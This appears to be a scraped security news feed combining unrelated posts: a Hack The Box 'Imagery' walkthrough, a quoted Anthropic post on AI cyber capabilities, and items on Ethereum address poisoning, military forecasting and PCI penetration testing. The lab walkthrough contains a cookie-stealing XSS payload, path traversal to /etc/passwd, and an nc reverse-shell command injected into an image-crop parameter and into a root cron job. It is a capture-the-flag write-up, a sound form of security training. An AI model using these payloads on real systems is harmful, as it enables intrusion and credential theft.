Security teams are under constant pressure to do more with the same resources. Manual processes, fragmented tools, and inefficient workflows can slow teams down and pull focus away from what matters most.

In this live webinar, experienced security practitioners share how they’ve escaped the constraints of limited

The post [Webinar] Doing More With Less: How Security Teams Escape Manual Work with Efficient Workflows appeared first on Security Boulevard.

Learn about the key differences between DAST and pentesting, the emerging role of AI pentesting, their roles in security testing, and which is right for your business.

The post DAST vs Penetration Testing: Key Differences in 2026 appeared first on Security Boulevard.

Introduction to Imagery:

In this write-up, we will explore the “Imagery” machine from Hack The Box, categorised as a Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Imagery” machine from Hack The Box by achieving the following objectives:

User Flag:

After gaining an initial foothold through weaknesses in the web application, access is gradually expanded beyond a standard user account. By leveraging exposed application data and mismanaged credentials, lateral movement becomes possible within the system. This progression ultimately leads to access to a regular system user account, where the user flag can be retrieved, marking the successful completion of the first objective.

Root Flag:

With user-level access established, further analysis reveals misconfigured privileges and trusted system utilities that can be abused. By carefully interacting with these elevated permissions and understanding how system-level automation is handled, full administrative control of the machine is achieved. This final escalation allows access to the root account and the retrieval of the root flag, completing the machine compromise.

Enumerating the Imagery Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oA initial 10.129.3.10

nmap -sC -sV -oA initial 10.129.3.10

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/imagery]
└──╼ $nmap -sC -sV -oA initial 10.129.3.10 
# Nmap 7.94SVN scan initiated Fri Jan 23 23:04:24 2026 as: nmap -sC -sV -oA initial 10.129.3.10
Nmap scan report for 10.129.3.10
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
|_  256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
8000/tcp open  http-alt Werkzeug/3.1.3 Python/3.12.7
|_http-title: Image Gallery
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/3.1.3 Python/3.12.7
|     Date: Sat, 24 Jan 2026 00:25:22 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

┌─[dark@parrot]─[~/Documents/htb/imagery]
└──╼ $nmap -sC -sV -oA initial 10.129.3.10 
# Nmap 7.94SVN scan initiated Fri Jan 23 23:04:24 2026 as: nmap -sC -sV -oA initial 10.129.3.10
Nmap scan report for 10.129.3.10
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
|_  256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
8000/tcp open  http-alt Werkzeug/3.1.3 Python/3.12.7
|_http-title: Image Gallery
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/3.1.3 Python/3.12.7
|     Date: Sat, 24 Jan 2026 00:25:22 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.1.3 Python/3.12.7
|     Date: Sat, 24 Jan 2026 00:25:15 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 146960
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Image Gallery</title>
|     <script src="static/tailwind.js"></script>
|     <link rel="stylesheet" href="static/fonts.css">
|     <script src="static/purify.min.js"></script>
|     <style>
|     body {
|     font-family: 'Inter', sans-serif;
|     margin: 0;
|     padding: 0;
|     box-sizing: border-box;
|     display: flex;
|     flex-direction: column;
|     min-height: 100vh;
|     position: fixed;
|     top: 0;
|     width: 100%;
|     z-index: 50;
|_    #app-con
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7

|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.1.3 Python/3.12.7
|     Date: Sat, 24 Jan 2026 00:25:15 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 146960
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Image Gallery</title>
|     <script src="static/tailwind.js"></script>
|     <link rel="stylesheet" href="static/fonts.css">
|     <script src="static/purify.min.js"></script>
|     <style>
|     body {
|     font-family: 'Inter', sans-serif;
|     margin: 0;
|     padding: 0;
|     box-sizing: border-box;
|     display: flex;
|     flex-direction: column;
|     min-height: 100vh;
|     position: fixed;
|     top: 0;
|     width: 100%;
|     z-index: 50;
|_    #app-con
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7

Analysis:

• Port 22 (SSH): SSH is available for remote access and may be used later if valid credentials are obtained.
• Port 8000 (HTTP): A Python-based web application is exposed on port 8000 and represents the primary attack surface for further enumeration.

Web Enumeration:

Web Application Exploration:

Features the app’s slogan “Capture & Cherish Every Moment” in large white text, followed by a description: “Your personal online gallery, designed for simplicity and beauty. Upload, organise, and relive your memories with ease.” Below that, a white section titled “Powerful Features at Your Fingertips” with three icons (a landscape image frame, a padlock for security, and a rocket for speed/performance). The navigation bar at the top includes “Home,” “Login,” and “Register.”

Application Overview

Centred white form on blue background titled “Register”. Fields: “Email ID” (placeholder: “Enter your email ID”) and “Password” (placeholder: “Enter your password” with eye icon for visibility). Blue “Register” button. ja

Fields pre-filled: “Email ID” as “dark@imagery.htb” and masked “Password”. Blue “Register” button.

Similar to register, titled “Login”. Fields pre-filled: “Email ID” as “dark@imagery.htb” and masked “Password”. Blue “Login” button, plus “Don’t have an account? Register here” link. Top nav: “Home”, “Login”, “Register”.

White background with title “Your Image Gallery”. A card message: “No images uploaded yet. Go to the ‘Upload’ page to add some!” Logged-in nav: “Home”, “Gallery”, “Upload”, “Logout” (red button).

Client-side JavaScript source code fetching and displaying admin bug reports from /admin/bug_reports with error handling and UI rendering logic.

JavaScript function handleDownloadUserLog redirects to /admin/get_system_log with a crafted log_identifier parameter based on username.

404 Not Found response when accessing the root /admin endpoint directly.

JSON access denied response (“Administrator privileges required”) when trying to access /admin/users as a non-admin user.

405 Method Not Allowed error on GET request to /report_bug, indicating the endpoint exists but requires a different HTTP method (likely POST).

App footer section showing copyright “© 2026 Imagery”, Quick Links (Home, Gallery, Upload, Report Bug), social media links, and contact info (support@imagery.com, fictional address).

Stored Cross-Site Scripting in Bug Reporting Feature on Imagery Machine

“Report a Bug” form pre-filled with “bugName”: “dark” and the same XSS cookie-stealing payload in Bug Details, ready for submission.

Terminal session as user “dark@parrot” running a local HTTP server (sudo python3 -m http.server 80) in the ~/Documents/htb/imagery directory to serve files/listen for requests on port 80.

Burp Suite capture of a successful POST to /report_bug, submitting JSON with “bugName”: “dark” and XSS payload in “bugDetails” (<img src=x onerror=”document.location=’http://10.10.14.133:80/?cookie=’+document.cookie”>), response confirms submission with admin review message.

The response of successful POST to /report_bug, submitting an XSS payload in bugDetails to exfiltrate cookies via redirect to the attacker’s server.

Burp Suite capture of GET request to /auth_status returning JSON with logged-in user details (username “dark@imagery.htb“, isAdmin false).

Local Python HTTP server log showing incoming request from target (10.129.3.10) with stolen admin session cookie in query parameter, plus 404 for favicon.

Burp Suite capture of GET to /admin/ endpoint returning standard 404 Not Found HTML error page.

Successful GET to /admin/users with stolen admin cookie returning JSON user list (admin with isAdmin:true, testuser with isAdmin:false).

JavaScript source snippet of handleDownloadUserLog function redirecting to /admin/get_system_log with the encoded log_identifier parameter.

Local File Inclusion Leading to Credential Disclosure

Failed LFI attempt on non-existent path returning 500 Internal Server Error with “Error reading file: 404 Not Found”.

Successful LFI exploitation via /admin/get_system_log retrieving /etc/passwd contents through path traversal payload “../../../../../../etc/passwd”.

Admin Panel interface (accessed with hijacked session) showing User Management with admin and testuser entries, plus empty Submitted Bug Reports section.

LFI retrieval of /proc/self/environ exposes environment variables (LANG, PATH, WEBHOME, WEBSHELL, etc.).

Retrieved db.json file contents via /admin/get_system_log path traversal, exposing user records with MD5-hashed passwords for admin and testuser, alongside an empty bug_reports array.

LFI retrieval of config.py source code exposing app constants like DATA_STORE_PATH=’db.json’, upload folders, and allowed extensions.

CrackStation online tool cracking the MD5 hash “2c65c8d7bfbca32a3ed42596192384f6” to plaintext “iambatman”.

Terminal output of failed SSH attempt as testuser@10.129.3.10 with publickey authentication denied.

Authenticating to the Imagery Application Using TestUser’s Credentials

Login page with Email ID pre-filled as “testuser@imagery.htb” and masked password field.

Empty Gallery page for logged-in user stating “No images uploaded yet. Go to the ‘Upload’ page to add some!”

Upload New Image form with “lips.png” selected (max 1MB, allowed formats listed), optional title/description, group “My Images”, uploading as Account ID e5f6g7h8.

Achieving Shell Access via Remote Code Execution

Gallery view showing single uploaded image “lips” (red lips icon) with open context menu offering Edit Details, Convert Format, Transform Image, Delete Metadata, Download, and Delete.

Visual Image Transformation modal in crop mode with selectable box over the red lips image, parameters set to x:0 y:0 width:193 height:172.

Successful Burp POST to /apply_visual_transform with valid crop params returning new transformed image URL in /uploads/admin/transformed/.

Burp capture of POST to /apply_visual_transform with invalid crop “x”:”id” parameter resulting in 500 error (“invalid argument for option ‘-crop'”).

Burp capture of POST to /apply_visual_transform injecting “cat /etc/passwd” via crop “x” parameter, resulting in 500 error exposing command output snippet.

Attacker terminal running netcat listener on port 9007 (nc -lvnp 9007).

Burp capture of POST to /apply_visual_transform with reverse shell payload in crop “x” parameter (“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.133 9007 >/tmp/f”).

Successful reverse shell connection from target (10.129.3.10) to attacker listener on port 9007, landing as web@Imagery.

Detailed directory listing of /web (app root) revealing source files (api_*.py, app.py, config.py, db.json, utils.py) and directories (bot, env, static, system_logs, templates, uploads).

Directory listing of /web/bot showing admin.py file owned by web user.

Source code of admin.py revealing Selenium automation bot with hardcoded admin credentials (“admin@imagery.htb“:”strongsandofbeach”), bypass token, and Chrome binary path.

Backup and Archive Discovery

Detailed directory listing of /var showing system directories (backup, backups, cache, crash, lib, local, log, mail, opt, run, snap, spool, tmp).

Directory listing of /var/backup showing an encrypted backup file web_20250806_120723.zip.aes.

Directory listing of /var/backups showing multiple compressed APT/dpkg state archives (.gz files).

Target starting Python HTTP server on port 9007 to serve the encrypted backup file.

Wget successfully downloading the encrypted backup file web_20250806_120723.zip.aes (22MB) from the target’s HTTP server on port 9007.

File command confirming web_20250806_120723.zip.aes is AES-encrypted data created by pyAesCrypt 6.1.1.

Attempt to run dpyAesCrypt.py failing with ModuleNotFoundError for ‘pyAesCrypt’ (case-sensitive import issue).

Successful pip3 user installation of pyaescrypt-6.1.1 package.

Failed execution of dpyAesCrypt.py due to ModuleNotFoundError for ‘termcolor’ (missing import dependency).

Successful pip3 user installation of termcolor-3.3.0 package.

Custom pyAesCrypt brute-forcer discovering password “bestfriends” early in the wordlist.

Successful decryption of the AES backup using “bestfriends”, outputting the original web_20250806_120723.zip.

The cunzip extracting the decrypted backup archive, revealing full app source (api_*.py, app.py, config.py, db.json, utils.py), templates, system_logs, env, and compiled pycache files.

cat of decrypted db.json revealing user database with admin (hashed password), testuser (“iambatman”), and mark (another hashed password).

CrackStation results cracking MD5 hashes to “iambatman”, “supersmash”, and “spiderweb1234” (one unknown).

Successful su to mark using password “supersmash”, confirming uid/gid 1002.

Python one-liner (python3 -c ‘import pty;pty.spawn(“/bin/bash”)’) to spawn an interactive bash shell.

ls -al in /home/mark showing files including user.txt (likely containing the flag).

We can read the user flag by typing the “cat user.txt” command

Escalate to Root Privileges Access to Imagery Machine

Privilege Escalation:

sudo -l reveals that user mark can run /usr/local/bin/charcol as root without a password (NOPASSWD).

charcol help output describing the CLI tool for encrypted backups, with commands (shell, help) and options (-quiet, -R for reset).

Failed charcol shell passphrase attempts (“bestfriend”, “supermash”, “supersmash”) resulting in lockout after multiple errors.

sudo charcol -R resetting application password to default (“no password” mode) after system password verification.

sudo charcol -R resetting application password to default (“no password” mode) after system password verification.

Repeated sudo charcol -R successfully resetting to no password mode.

charcol interactive shell entry after initial setup, displaying ASCII logo and info message.

charcol help output explaining backup/fetch commands and “auto add” for managing automated (root) cron jobs, with security warnings.

Attacker terminal running netcat listener on port 9007 in preparation for reverse shell.

Successful “auto add” command creating a root cron job with reverse shell payload to attacker (10.10.14.133:9007), verified with system password “supersmash”.

Successful privilege escalation to root via a malicious cron job triggered a reverse shell, followed by reading the root flag from /root/root.txt

The post Hack The Box: Imagery Machine Walkthrough – Medium Difficulity appeared first on Threatninja.net.

Artificial intelligence (AI) systems rarely fail in obvious ways. No red error screen. No crashed service. No broken button. They fail quietly. Outputs look confident...Read More

The post Shift Left QA for AI Systems. Catching Model Risk Before Production appeared first on ISHIR | Custom AI Software Development Dallas Fort-Worth Texas.

The post Shift Left QA for AI Systems. Catching Model Risk Before Production appeared first on Security Boulevard.

Really interesting blog post from Anthropic:

In a recent evaluation of AI models’ cyber capabilities, current Claude models can now succeed at multistage attacks on networks with dozens of hosts using only standard, open-source tools, instead of the custom tools needed by previous generations. This illustrates how barriers to the use of AI in relatively autonomous cyber workflows are rapidly coming down, and highlights the importance of security fundamentals like promptly patching known vulnerabilities.

[…]

A notable development during the testing of Claude Sonnet 4.5 is that the model can now succeed on a minority of the networks without the custom cyber toolkit needed by previous generations. In particular, Sonnet 4.5 can now exfiltrate all of the (simulated) personal information in a high-fidelity simulation of the Equifax data breach—­one of the costliest cyber attacks in history—­using only a Bash shell on a widely-available Kali Linux host (standard, open-source tools for penetration testing; not a custom toolkit). Sonnet 4.5 accomplishes this by instantly recognizing a publicized CVE and writing code to exploit it without needing to look it up or iterate on it. Recalling that the original Equifax breach happened by exploiting a publicized CVE that had not yet been patched, the prospect of highly competent and fast AI agents leveraging this approach underscores the pressing need for security best practices like prompt updates and patches. ...

The post AIs are Getting Better at Finding and Exploiting Internet Vulnerabilities appeared first on Security Boulevard.

This one-time purchase delivers SSD speed, security tools, and CDN-backed performance without monthly fees.

The post Hostnirvana Offers Lifetime Hosting for Three Websites for Just $20 appeared first on TechRepublic.

This one-time purchase delivers SSD speed, security tools, and CDN-backed performance without monthly fees.

The post Hostnirvana Offers Lifetime Hosting for Three Websites for Just $20 appeared first on TechRepublic.

The Defense Logistics Agency — an organization responsible for supplying everything from spare parts to food and fuel — is turning to artificial intelligence and machine learning to fix a long-standing problem of predicting what the military needs on its shelves.

While demand planning accuracy currently hovers around 60%, DLA officials aim to push that baseline figure to 85% with the help of AI and ML tools. Improved forecasting will ensure the services have access to the right items exactly when they need them. 

“We are about 60% accurate on what the services ask us to buy and what we actually have on the shelf.  Part of that, then, is we are either overbuying in some capacity or we are under buying. That doesn’t help the readiness of our systems,” Maj. Gen. David Sanford, DLA director of logistics operations, said during the AFCEA NOVA Army IT Day event on Jan. 15.

Rather than relying mostly on historical purchase data, the models ingest a wide range of data that DLA has not previously used in forecasting. That includes supply consumption and maintenance data, operational data gleaned from wargames and exercises, as well as data that impacts storage locations, such as weather.

The models are tied to each weapon system and DLA evaluates and adjusts the models on a continuing basis as they learn. 

“We are using AI and ML to ingest data that we have just never looked at before. That’s now feeding our planning models. We are building individual models, we are letting them learn, and then those will be our forecasting models as we go forward,” Sanford said.

Some early results already show measurable improvements. Forecasting accuracy for the Army’s Bradley Infantry Fighting Vehicle, for example, has improved by about 12% over the last four months, a senior DLA official told Federal News Network.

The agency has made the most progress working with the Army and the Air Force and is addressing “some final data-interoperability issues” with the Navy. Work with the Marine Corps is also underway. 

“The Army has done a really nice job of ingesting a lot of their sustainment data into a platform called Army 360. We feed into that platform live data now, and then we are able to receive that live data. We are ingesting data now into our demand planning models not just for the Army. We’re on the path for the Navy, and then the Air Force is next. We got a little more work to do with Marines. We’re not as accurate as where we need to be, and so this is our path with each service to drive to that accuracy,” Sanford said.

Demand forecasting, however, varies widely across the services — the DLA official cautioned against directly comparing forecasting performance.

“When we compare services from a demand planning perspective, it’s not an apples-to-apples comparison.  Each service has different products, policies and complexities that influence planning variables and outcomes. Broadly speaking, DLA is in partnership with each service to make improvements to readiness and forecasting,” the DLA official said.

The agency is also using AI and machine learning to improve how it measures true administrative and production lead times. By analyzing years of historical data, the tools can identify how industry has actually performed — rather than how long deliveries were expected to take — and factor that into DLA stock levels.  

“When we put out requests, we need information back to us quickly. And then you got to hold us accountable to get information back to you too quickly. And then on the production lead times, they’re not as accurate as what they are. There’s something that’s advertised, but then there’s the reality of what we’re getting and is not meeting the target that that was initially contracted for,” Sanford said.

The post DLA turns to AI, ML to improve military supply forecasting first appeared on Federal News Network.

Ethereum’s network has been buzzing. Blocks are full, wallets show new activity, and on-chain counters are ticking up fast. But not all of that motion looks like real people using the chain.

Address Poisoning On The Spotlight

In a recent blog post, researcher Andrey Sergeenkov warned that a recent Ethereum upgrade is being exploited to send tiny transactions that create misleading wallet history entries, a tactic known as address poisoning.

According to the expert, a big slice of the traffic may be the result of “dusting” or address poisoning attacks. Small, almost worthless transfers — sometimes less than a dollar — are being sent to a wide range of addresses.

Record-high Ethereum activity that everyone’s celebrating is an address poisoning attack.

– Over $740K already stolen, and growing – This became possible thanks to the Fusaka upgrade – This attack is ongoing right nowhttps://t.co/cqoEvqttQd

— Andrey Sergeenkov (@Nikopolos) January 19, 2026

These tiny transfers create fake-looking entries in a wallet’s history. People who skim their recent transactions or copy addresses from a short list of past contacts can be tricked into sending funds to a scammer by mistake. It is a basic trick that gets more power when fees fall.

Why It Happened

Reports say that after recent updates and lower average gas costs, sending millions of tiny transactions became affordable. When fees drop, attackers can spray dust across large numbers of wallets and run follow-up scams at scale.

The tactic uses two steps: first, make a history entry that looks like a real counterparty; second, hope a user copies that wrong entry. Some attacks aim to deanonymize users, while others are pure bait to steal funds later.

An Ethereum wallet owner might glance at a list and use the wrong address. Or they might be prompted by a message that seems to match a past transfer. Either way, if funds are sent to the attacker, those funds are usually gone.

Reports estimate that hundreds of thousands of dollars have been siphoned from victims who fell for different versions of this trick. The sums are not always massive per case, but they add up when many victims are targeted.

Look for small incoming transfers from addresses you do not recognize, especially when those transfers appear in large batches. Watch for identical token amounts or for many transfers with the same memo or pattern.

Wallets that show sudden clusters of tiny token receipts are worth extra caution. Security tools and some wallets can hide tiny transfers or warn users about unusual incoming dust. Use those features if they are available.

Based on reports, researchers urge people to verify the full address they are sending to, not just the start or end of it. Use address book features, QR codes, or trusted contacts to confirm destinations.

Avoid copying addresses from a short recent-history view. If you receive a small, unexpected deposit, take it as a warning sign, not an invitation.

Featured image from Pexels, chart from TradingView

Manus is adding app publishing that aims to turn a described app into an installable mobile build, handling packaging while you finish distribution in Google Play Console or App Store Connect and TestFlight.

The post You can publish apps from Manus without Xcode or Android Studio appeared first on Digital Trends.

Last Updated on January 20, 2026 by Narendra Sahoo

What Is PCI Penetration Testing

PCI penetration testing is performed to identify security vulnerabilities in line with PCI DSS requirements.

PCI DSS 4.0.1 penetration testing requirements are targeted at:

• Internal systems that store, process, or transmit card data
• Public-facing devices and systems
• Databases

This is a controlled form of an ethical hacking exercise with the following objectives:

1. Assess the access security and segmentation controls in line with PCI compliance requirements.
2. Determine whether a threat actor could gain unauthorized access to CDE systems that store, process, or transmit payment data.
3. To verify the security environment and solutions, protect credit/debit card data such as CHD and SAD up to the PCI compliance security assessment
4. To prevent PCI DSS non-compliance due to testing gaps.

Overview of PCI DSS 4.0.1

Overall, PCI DSS 4.0.1 is a set of 12 requirements distributed over six goals as a security standard for credit cards and debit cards. Not having proper documentation, poor protocols, or insufficient penetration testing may be among the reasons as to why PCI DSS audits fail.

What Penetration systems means for PCI DSS

What PCI DSS requires

PCI DSS Requirement 11.3 penetration testing: the 11.3 requirement in PCI DSS explicitly mandates the active use of penetration testing at least once a year and major changes made to your organizations’ systems and tech stack.

Explanation of Key Terms (ASV and QSA)

A QSA is a qualified security assessor: the person who will approve all the things that you’re doing to say you’re passing the audit. An ASV is an external party that will do the vulnerability scan for your network that’s approved by the PCI Council.

Common industry practice: external penetration testing

Companies are often looking for a PCI DSS pentesting provider for their penetration testing objectives which can be achieved via internal vs external PCI penetration testing: Most organizations prefer to hire an external consultant to carry out their penetration testing. It is the standard procedure. For organizations wanting to reduce costs, they can consider doing a penetration test internally.

Carrying out penetration testing internally.

Carrying out penetration testing internally would be judged by the auditing team for PCI DSS later. The PCI DSS audit would scrutinize your internal penetration testing efforts and documentation to judge it for sufficient expertise and no conflict of interest.

Working with the auditor such as the QSA helps informing them beforehand of your intent to carry out penetration testing internally would support efforts to pass the PCI DSS audit. PCI compliance penetration testing

Criteria #1: Sufficient Qualifications

You must have sufficient qualifications to carry out penetration testing internally. One needs to be a security professional or have training in the official penetration training product. Other ways to prove sufficiency are effective work experience. Again, planning to work with the QSA by informing them beforehand is key. Companies must be aware of what evidence PCI auditors expect from penetration testing like these.

Criteria #2: No Conflict of Interest

The second criteria are no conflict of interest. That means there is no conflict of interest between the groups of people who built the systems for scope, as well as the penetration tester who is testing the system. Often a PCI auditor may give you a waiver. Being organizationally separate helps. In a small organization, the QSA typically does give a waiver if you don’t have enough people to prevent that conflict of interest.

Role of Penetration Testing in Achieving PCI DSS Goals

Organizations achieve PCI DSS goals naturally via differentiated paths. Compliance requirements and implementation may differ in point in time; the value of penetration testing aims to uncover the areas and help organizations converge toward implementation that is identical if not extraneous in scope to compliance.

One can ideally think of penetration testing in a broader sense as an investigatory and study-based set of actions. In this manner, there are numerous benefits beyond merely identifying the areas where implementation of PCI DSS and compliance requirements differ.

When Penetration Testing Is Required Under PCI DSS

A penetration testing routine for any companies’ PCI DSS implementation eventually leads to a deeper and better understanding of their respective security posture, generates reports and documentation for posterity, and improves the organization’s ability and willingness to deal effectively with payment card security and data.

Insights from VISTA InfoSec – PCI DSS Compliance Fails Most Often Between Audit Cycles

One of the biggest misconceptions VISTA InfoSec always has to set straight with clients tackling PCI DSS is them treating it like a once-a-year event. PCI isn’t a point-in-time certification—it’s an ongoing operational requirement. What usually breaks compliance isn’t missing controls; it’s what happens after the audit. Quarterly ASV scans don’t get run; internal vulnerability assessments fall behind, and recurring reviews quietly stop. By the time the next assessment comes around, the controls exist—but the evidence doesn’t.

PCI DSS Penetration Testing Requirements

1. Build and maintain a secure network and systems
2. Protect cardholder data
3. Maintain a vulnerability management program
4. Implement strong access control measures
5. Regularly monitor and test networks
6. Maintain an information security policy

Insights from VISTA InfoSec – External ASV Scanning Is Frequently Misunderstood and Misapplied

VISTA InfoSec frequently encounters this issue across PCI DSS assessments: we have worked for clients who had their ASV scans being used for internal vulnerabilities. ASV scans are very specific in what they’re meant to do. They only apply to externally exposed IP addresses. What they are not is a replacement for internal vulnerability scanning. PCI DSS is very clear about separating external exposure testing from internal risk discovery, and assessors see this mistake all the time. If you’re using ASV scans to justify skipping internal assessments, that’s a compliance issue waiting to happen.

Hence, VISTA InfoSec recommends a practical solution to treat ASV scans and internal vulnerability assessments as complementary controls with distinct objectives, not substitutes.

Penetration Testing Context and Objectives

Penetration testing for PCI DSS follows the same format as it does in another context. Aims for PCI DSS penetration testing is the same as in other contexts.

It aims to uncover the vulnerabilities and flaws in the implementation of a PCI DSS based solution for companies. As companies protect their data and payment information via PCI DSS, penetration testing approaches uncover them and help an organization retain their security posture.

Insights from VISTA InfoSec – Segmentation Cannot Be Assumed, It Must Be Proven

At VISTA InfoSec, we observed a common misconception when working over multiple PCI DSS client environments, where segmentation is often treated as a design assertion rather than a control that must be continuously proven.

Segmentation as a security control, not a design feature: Segmentation is only valid under PCI DSS if you can prove it works. That means testing it. Half-yearly segmentation penetration testing is required to demonstrate that traffic is limited exactly the way you say it is—between card and non-card environments and within internal CDE zones. Diagrams and documentation help, but they’re not enough. Assessors expect technical evidence that lateral movement is blocked in the real world.

Refining PCI DSS Security Posture Through Testing

Thus, the general penetration test conducted to assess an organization’s PCI DSS posture eventually refines it via the discovery of vulnerabilities, weaknesses, flaws, and potential exploits. PCI DSS compliance security posture testing and validation is key for assessing the effectiveness of the security posture of any organization aiming to assess their security posture for PCI DSS.

Types of Penetration Tests Required by PCI DSS

Penetration Testing vs Vulnerability Scanning (PCI Context)

Analogy: PCI DSS and Penetration Testing

In analogy terms, think of PCI DSS as the locks and safeguards one places on their company’s cardholder data. A penetration test, or testing in this context are the guided, overseen and managed deliberate attempts to attempt to break these locks to gauge vulnerabilities, identify flaws, and report them to improve security posture via finding gaps and weaknesses. PCI DSS penetration testing to validate real-world security controls involves testing PCI DSS safeguards against real attack scenarios.

Evidence PCI Auditors Expect from Penetration Testing

Why Declared Compliance Is Not Enough

Even if a company says they follow PCI DSS, there may very well be holes, misconfigurations, or ways attackers could sneak in.

Common PCI DSS Penetration Testing Failures

Why PCI DSS 4 Leans So Heavily on Testing

Under older models’ compliance was often point-in-time and evidence heavy. An added downside was that compliance was slow to adapt to real risk.

Who Is Responsible for PCI DSS Penetration Testing

Penetration Testing and the Shift Toward Effectiveness

Penetration testing is thus ideal for PCI DSS and this shift in emphasis. As it forces different implementations to converge toward real security. It exposes implementations where PCI DSS controls look right but fall short in behavior. Additionally, it validates whether your security posture technically resists attack.

How PCI DSS 4.0 Changes Expectations for Penetration Testing

Objectives and Benefits of PCI Penetration Testing and Vulnerability Analysis

All outcomes of penetration testing analysis aim to prove equivalence to the need to protect credit card data. Vulnerability analysis aims to locate and identify weaknesses and potential gaps, exploits that can lead to loss of security of credit card data.

Penetration testing and vulnerability analysis isn’t merely about just ticking up a compliance box. There are very real practical benefits arising out of doing this properly. Firstly, it is about protecting one’s cardholder data environment – CDE. A solid penetration is used to verify that access controls actually work for your card data on the need-to-know basis, not merely on paper. Obviously, a solid penetration testing campaign is necessary for proving that your systems, controls and processes protect cardholder data.

Another objective is to test segmentation across networked systems. When one validates segmentation via penetration testing, you prove and reduce the risk of insider threats. Segmentation is required to prove your organization effectively limits access to networks where credit card data is stored and transmitted. You’re proving that even if someone has access to part of the network, they can’t laterally move into systems that store, process, or transmit cardholder data.

Penetration testing also helps you identify common but high-impact web application vulnerabilities—things like SQL injection, broken authentication, and session management issues. These are exactly the kinds of weaknesses attackers look for, and PCI explicitly expects you to test them.

Being able to demonstrate that you regularly test your environment shows customers, partners, and your supply chain that you take data security seriously. That matters increasingly, especially when third-party risk is under scrutiny.

From a compliance standpoint, regular testing helps you maintain PCI DSS compliance over time, not just during audit season. It supports a more proactive security posture instead of reacting to findings once a year.

And finally, penetration testing is one of the most effective ways to uncover insecure configurations—across systems, networks, and applications—that might otherwise go unnoticed. These are often the exact issues that lead to audit findings or real-world breaches.

So overall, PCI testing isn’t just about passing an audit. It’s about proving that your controls actually work, in real conditions.

Insights from VISTA InfoSec – Cardholder Data Discovery Is About Preventing Silent Data Drift

At VISTA InfoSec, we were called for a major enterprise who had experienced data breach even though certified in PCI DSS. After due investigation, our consultants observed that the breached card data was residing on systems not in scope. This happened as cardholder data discovery was limited to systems already assumed to be in scope. This is an issue we have seen across multiple clients over the past 15 years. Our clients had previously overlooked data drift, where card data spread into non-card environments via logs, backups, integrations, or analytics workflows.

In one representative case, transaction payloads containing partial PAN data were logged by an application middleware layer and forwarded to a centralized logging and analytics platform classified as out of scope. Over time, those logs were backed up to shared storage and replicated across regions, creating multiple unintended copies of card data outside the defined CDE.

Cardholder data discovery isn’t just about scanning systems you already believe are in scope. It’s about making sure card data hasn’t quietly drifted somewhere it shouldn’t be. That’s why CHD scans need to cover both card and non-card environments. They help confirm that sensitive data hasn’t been duplicated, stored unencrypted, or left behind in unexpected places—and they’re critical for validating where card data really exists when you’re making ROC assertions.

Conclusion

PCI DSS formally lists penetration testing as part of requirement 11.3, while most companies hire external consultants such as the ASV or a QSA; many are unaware companies can pentest internally. As part of compliance, your penetration testing will occur at least once a year and definitely after major changes to your systems and technologies.

Companies often prefer extensive penetration testing and are advised to do so working ahead of time with the QSAs to increase their chances of meeting compliance. Penetration testing for PCI DSS helps retain security posture, identify vulnerabilities, and ensure robust practices for maintaining credit card data security.

Need Expertise for Implementing PCI DSS 4.0.1?

At VISTA InfoSec, we don’t help you prepare for an audit—we help you build security that stands up to real-world attacks. As PCI DSS threats become more automated and complex, organizations need more than checklists and templates. Whether your organization needs a PCI compliance security assessment to evaluate posture, or a waiver requirement for avoiding conflict of interest with your QSA for PCI DSS, to appropriate cardholder data environment penetration testing, we understand organizations requirements:

• They need experienced guidance, tested controls, and continuous assurance.
• Our certified experts work alongside your teams to clearly define scope, close compliance gaps, validate controls, and ensure you are audit-ready across people, processes, and technology.
• Continuous PCI Compliance testing
• PCI DSS cloud penetration testing

